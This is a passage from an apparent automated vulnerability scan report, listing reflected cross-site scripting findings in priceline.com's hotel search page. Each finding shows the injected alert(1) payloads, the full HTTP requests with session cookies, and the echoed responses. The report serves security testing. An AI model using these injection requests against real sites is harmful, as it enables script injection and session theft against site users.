User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:43:14 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=4663010a5064010a20111003004314002011599695; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A43%3A14&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:43:14 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8667
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="hotelBrand" value="29ff7"style="x:expression(alert(1))"82960f0a095"/>
...[SNIP]...

4.128. http://travela.priceline.com/hotel/searchHotels.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0297"style%3d"x%3aexpression(alert(1))"aedf6b2132a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e0297"style="x:expression(alert(1))"aedf6b2132a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A&e0297"style%3d"x%3aexpression(alert(1))"aedf6b2132a=1 HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:45:22 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a201110030045223ae011572881; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A45%3A22&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:45:22 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8750
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="e0297"style="x:expression(alert(1))"aedf6b2132a" value="1"/>
...[SNIP]...

4.129. http://travela.priceline.com/hotel/searchHotels.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b8ab"><script>alert(1)</script>2b9240160eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Content-Length: 286
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand=&2b8ab"><script>alert(1)</script>2b9240160eb=1

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:19:19 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a5463010a20111003001919c5e011712643; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A19%3A19&ID=IGOUGO&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:19:19 GMT; Path=/
Set-Cookie: JSESSIONID=A5DE3817EF386B221CA4ABD0FE39259E; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8982
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="2b8ab"><script>alert(1)</script>2b9240160eb" value="1"/>
...[SNIP]...

4.130. http://travela.priceline.com/hotel/searchHotels.do [numberOfRooms parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the numberOfRooms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd99f"style%3d"x%3aexpression(alert(1))"2bc29a6757e was submitted in the numberOfRooms parameter. This input was echoed as bd99f"style="x:expression(alert(1))"2bc29a6757e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1bd99f"style%3d"x%3aexpression(alert(1))"2bc29a6757e&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:42:56 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5064010a20111003004256877011587358; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A42%3A56&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:42:56 GMT; Path=/
Set-Cookie: JSESSIONID=69CCD8D0CD8EEF485DD6617962BF3357; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8720
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="numberOfRooms" value="1bd99f"style="x:expression(alert(1))"2bc29a6757e"/>
...[SNIP]...

4.131. http://travela.priceline.com/hotel/searchHotels.do [numberOfRooms parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the numberOfRooms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d44fc"style%3d"x%3aexpression(alert(1))"74199effe499a77bf was submitted in the numberOfRooms parameter. This input was echoed as d44fc"style="x:expression(alert(1))"74199effe499a77bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States&starRating=-1&numberOfRooms=1d44fc"style%3d"x%3aexpression(alert(1))"74199effe499a77bf&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:17:54 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5564010a4663010a201110030017545d2011734785; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A17%3A54&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:17:54 GMT; Path=/
Set-Cookie: JSESSIONID=6C322477FCDDB42D9406EFC2F24445EF; Path=/hotel
Vary: Accept-Encoding
Content-Length: 9006
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="numberOfRooms" value="1d44fc"style="x:expression(alert(1))"74199effe499a77bf"/>
...[SNIP]...

4.132. http://travela.priceline.com/hotel/searchHotels.do [otherCityName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the otherCityName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82227"style%3d"x%3aexpression(alert(1))"87e976f77a3f47fe8 was submitted in the otherCityName parameter. This input was echoed as 82227"style="x:expression(alert(1))"87e976f77a3f47fe8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC20111003000909914181269334&plf=pcln&INIT_SESSION=true&RefID=PLIGOUGO&RefClickID=HOTELSEARCH&checkInDate=10%2F04%2F11&CkInMonth=10&CkInDay=04&CkInYear=2011&checkOutDate=10%2F07%2F11&CkOutMonth=10&CkOutDay=07&CkOutYear=2011&homepage=Y&Initialized=Y&cityName=Boston%2CUnited+States&otherCityName=Boston%2CUnited+States82227"style%3d"x%3aexpression(alert(1))"87e976f77a3f47fe8&starRating=-1&numberOfRooms=1&searchHotelName=&hotelBrand= HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Origin: http://www.priceline.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/QP.asp?ProductID=5R&refid=PLIGOUGO&refclickid=HOTELSEARCH&City=Boston,United%20States&Rooms=1&CheckInDate=10/04/11&CheckOutDate=10/07/11
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A9; Referral=SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A9%3A9&ID=IGOUGO&CLICKID=HOTELSEARCH; vsch=v2011100300090989417126%5F98264026; PSessKey=711510AC721510AC20111003000909914181269334; vid=v2011100300090989417126; SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317600550352:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.1.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:17:03 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5064010a5463010a201110030017035aa011737985; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A17%3A03&ID=IGOUGO&SOURCEID=PL&PRODUCTID=; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:17:03 GMT; Path=/
Set-Cookie: JSESSIONID=4B6C5D44D13501B0C968A11FCE810B02; Path=/hotel
Vary: Accept-Encoding
Content-Length: 8919
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="otherCityName" value="Boston,United States82227"style="x:expression(alert(1))"87e976f77a3f47fe8"/>
...[SNIP]...

4.133. http://travela.priceline.com/hotel/searchHotels.do [passingValues parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the passingValues request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9e1d"style%3d"x%3aexpression(alert(1))"124d58d7924 was submitted in the passingValues parameter. This input was echoed as d9e1d"style="x:expression(alert(1))"124d58d7924 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YESd9e1d"style%3d"x%3aexpression(alert(1))"124d58d7924&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:44:52 GMT
Server: Apache
Set-Cookie: PSessKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=; Domain=.priceline.com; Path=/
Set-Cookie: JSessionKey=5463010a5064010a201110030044528e8011589182; Domain=.priceline.com; Path=/
Set-Cookie: Referral=CLICKID=TRIP_HOTELSEARCH&WEBENTRYTIME=10%2F02%2F2011+20%3A44%3A52&ID=AWAYNETWORK&PRODUCTID=&SOURCEID=PL; Domain=.priceline.com; Expires=Wed, 02-Nov-2011 00:44:52 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 8689
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--Start of taglibs.jsp page-->


<!--End of taglibs.jsp page-->


...[SNIP]...
<input type="hidden" name="passingValues" value="YESd9e1d"style="x:expression(alert(1))"124d58d7924"/>
...[SNIP]...

4.134. http://travela.priceline.com/hotel/searchHotels.do [plf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://travela.priceline.com
Path:   /hotel/searchHotels.do

Issue detail

The value of the plf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99caf"style%3d"x%3aexpression(alert(1))"833635bc1c4 was submitted in the plf parameter. This input was echoed as 99caf"style="x:expression(alert(1))"833635bc1c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /hotel/searchHotels.do?session_key=711510AC721510AC2011100300374475eeb1270807&plf=pclh99caf"style%3d"x%3aexpression(alert(1))"833635bc1c4&INIT_SESSION=true&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH&searchType=CITY&cityName=bos&numberOfRooms=1&hotelBrand=&searchHotelName=&starRating=-1&checkInDate=10%2F09%2F2011&checkOutDate=10%2F16%2F2011&KMode=Y&selectedTab=0&passingValues=YES&affiliateSubID=514A HTTP/1.1
Host: travela.priceline.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.priceline.com/qp.asp?productid=5&city=bos&rooms=1&checkindate=10/09/2011&checkoutdate=10/16/2011&refid=PLAWAYNETWORK&refclickid=TRIP_HOTELSEARCH
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=d029e777cf494e903eef89a4c018b0f4; SETI=CCD82172E0702BC07F6EEEC20A4BA00AC57A5F491C628C0467A073D149FA2A3BB6E6E8BBB79E476AEE07A579D4DB94147A61E206E535A32806BAB0F253612BA6DBDA270CF1B13D3FC57A5F491C628C04AC84BA6362ADBF59CACA2EC5D22C91F0A30B769ACEDACD603314752CB71B92D3; vid=v2011100300373188ec0127; vsch=v2011100300373188ec0127%5F13692735; Referral=CLICKID=TRIP%5FHOTELSEARCH&SOURCEID=PL&PRODUCTID=&WEBENTRYTIME=10%2F2%2F2011+20%3A37%3A31&ID=AWAYNETWORK; Stick2=ID=0%7CA%7C10%2F2%2F2011+20%3A37; WT_FPC=id=2681d53fc9a0a3b6dd31317600550352:lv=1317602255259:ss=1317600550352; __utma=137358961.1769259490.1317600551.1317600551.1317600551.1; __utmb=137358961.3.10.1317600551; __utmc=137358961; __utmz=137358961.1317600551.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; PSessKey=711510AC721510AC2011100300374475eeb1270807

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:41:52 GMT
